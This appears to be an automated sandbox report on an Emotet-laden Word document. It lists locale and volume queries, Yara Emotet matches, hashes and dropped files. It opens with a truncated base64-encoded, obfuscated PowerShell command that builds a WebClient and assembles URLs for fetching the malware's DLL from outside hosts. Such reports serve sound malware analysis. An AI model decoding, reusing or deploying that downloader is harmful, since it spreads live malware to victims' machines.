AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnACsAJwB0AG8AZQAnACkAKwAoACgAJwBzAEoAKQAnACsAJwAoADMAJwApACkAK	Jump to behavior

Language, Device and Operating System Detection:

Contains functionality to query locales information (e.g. system language)

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,	7_2_10010000
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	7_2_10011C13
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,	7_2_1001106A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	7_2_10011874
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	7_2_10011C7A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,	7_2_10011CB6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,	7_2_1001190C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	7_2_10011980
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW,	7_2_10013DAF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,	7_2_10014DB7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,__alloca_probe_16,_malloc,GetLocaleInfoW,WideCharToMultiByte,GetLocaleInfoA,	7_2_10013DE3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	7_2_100109FC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,	7_2_10009A59
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,	7_2_100112C2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,	7_2_10014F07
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	7_2_10013F22
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,	7_2_1000C727
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	7_2_10011B52
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,GetLocaleInfoA,GetACP,	7_2_1001175D

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_1000E372 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

7_2_1000E372

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

AV process strings found (often used to terminate AV products)

Source: powershell.exe, 00000005.00000002.2093002580.0000000000137000.00000004.00000020.sdmp

Binary or memory string: Sched.exe

Stealing of Sensitive Information:

Yara detected Emotet

Source: Yara match	File source: 00000008.00000002.2096911565.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2096946723.00000000001C1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2098974182.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2102146226.0000000000270000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2106781352.0000000000691000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2104372498.0000000000211000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2094781101.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2097726962.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2342697153.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2103138481.00000000001F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2097776820.00000000001C1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2102968277.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2106704317.0000000000670000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2104274004.0000000000150000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2101214081.00000000006B1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2102416514.0000000000711000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2099046063.0000000000201000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2101161516.0000000000690000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2108288197.00000000001C1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2108254547.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2342767319.00000000002D1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 12.2.rundll32.exe.270000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.150000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.270000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.220000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.2d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.670000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.690000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.6b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.150000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.670000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.690000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.710000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.220000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.290000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE

ID:	337532
Product:	CloudBasic
Start time:	18:10:14
Start date:	08.01.2021
Sample:	Doc.doc
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	16f391d60eff19aabb43225c85d5145c
SHA1:	58becf84bea5dafb9d46afc194a4eaf946fa4c72
SHA256:	af5c3952d0c7a7a2925c6086aa050dd076afc1adead3663dc2141087009a6d87
Filetype:	Microsoft Word document (32009/1) 54.23%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{99DD3073-AAC4-4BB8-A12E-BAAB271DD5EB}.tmp	data	CF70770B18EE4D2D3584E26882E961A9	B674900882E193830D40625F6FB3968665CF88F5	11491FBEEBBF8D1C6B421C310B38DA090923E2B20CF966E70AE7AE8B906C5833
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D1AA7D61-551E-40AF-9919-E039C2A6E74E}.tmp	data	5D4D94EE7E06BBB0AF9584119797B23A	DBB111419C704F116EFA8E72471DD83E86E49677	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd	data	CEF28C6E4F49BB0DE2976E073BAB441E	CA58C8432E040057B717AC133A9265853586BA0D	1D4FA10D7A83016498AB2358804248BAF6817D661558040F362B1A354004C40D
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Doc.LNK	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:14 2020, mtime=Wed Aug 26 14:08:14 2020, atime=Sat Jan 9 01:10:34 2021, length=206336, window=hide	C38445A30D6C8B15D19CCC6F96CED1AB	5FC35945C876F1605C2864C6BF6090D75A5DD137	9C927546DD20294D9904134808A510BF562DB8FA4C29BE2C80DDE3875DEC98C5
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat	ASCII text, with CRLF line terminators	071D4A911934095DE3D17DDC9112A372	5765B8D82EE7042EA3223FE74B8F7B8CE92977B0	3F7D6A8692933570421B2ABAA5D00299928FFAEB27FBD44CA64901D4DD018E2F
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm	data	39EB3053A717C25AF84D576F6B2EBDD2	F6157079187E865C1BAADCC2014EF58440D449CA	CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CNLDNGQDOXTNQW5LTFBN.temp	data	2F954C783E9CD474F876CD96D4950B3C	5E872158635EA3B407AEEE7CCD1701B20DBD7DC2	63B0E7657CA6D348F80B4A75B33EAC54614B21FD92B963AB169297C0D39BDA4E
C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	0BCAFFBDA4138F2EE2786CFD098C1DA9	3D6E52F126809C05E69F1D543B7F8D53435A8E17	5E9F4504B7E0938A2B2EB9A7F090BE9F4B1101AA3BE145A3B5895CB14BACD0EF
C:\Users\user\Desktop\~$Doc.doc	data	39EB3053A717C25AF84D576F6B2EBDD2	F6157079187E865C1BAADCC2014EF58440D449CA	CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A

Analysis Report Doc.doc

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Cryptography:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs